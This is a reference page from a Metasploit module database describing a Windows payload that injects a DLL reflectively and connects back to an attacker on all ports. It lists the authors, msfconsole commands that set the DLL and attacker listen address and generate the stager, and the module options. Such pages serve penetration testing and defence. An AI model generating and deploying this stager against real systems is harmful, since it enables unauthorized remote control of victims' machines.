Reflective DLL Injection, Reverse All-Port TCP Stager | Metasploit Exploit Database (DB)

Home > Exploit DB

Reflective DLL Injection, Reverse All-Port TCP Stager

Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a DLL via a reflective loader

Search Other Modules

Rank

Normal

Authors

sf < stephen_fewer [at] harmonysecurity.com >
hdm < hdm [at] metasploit.com >
skape < mmiller [at] hick.org >

Vulnerability References

https://github.com/stephenfewer/ReflectiveDLLInjection

Similar Modules

Usage Information

$ msfconsole

                ##                          ###           ##    ##
##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use payload/windows/dllinject/reverse_tcp_allports
msf payload(reverse_tcp_allports) > set DLL [PATH]
msf payload(reverse_tcp_allports) > set LHOST [MY IP ADDRESS]
msf payload(reverse_tcp_allports) > generate

Module Options

DLL	The local path to the Reflective DLL to upload
EXITFUNC	Exit technique: none, seh, process, thread (default: process)
LHOST	The listen address
LPORT	The starting port number to connect back on (default: 1)
ReverseConnectRetries	The number of connection attempts to try before exiting the process
ReverseListenerBindAddress	The specific IP address to bind to on the local system
ReverseListenerComm	The specific communication channel to use for this listener
VERBOSE	Enable detailed status messages
WORKSPACE	Specify the workspace for this module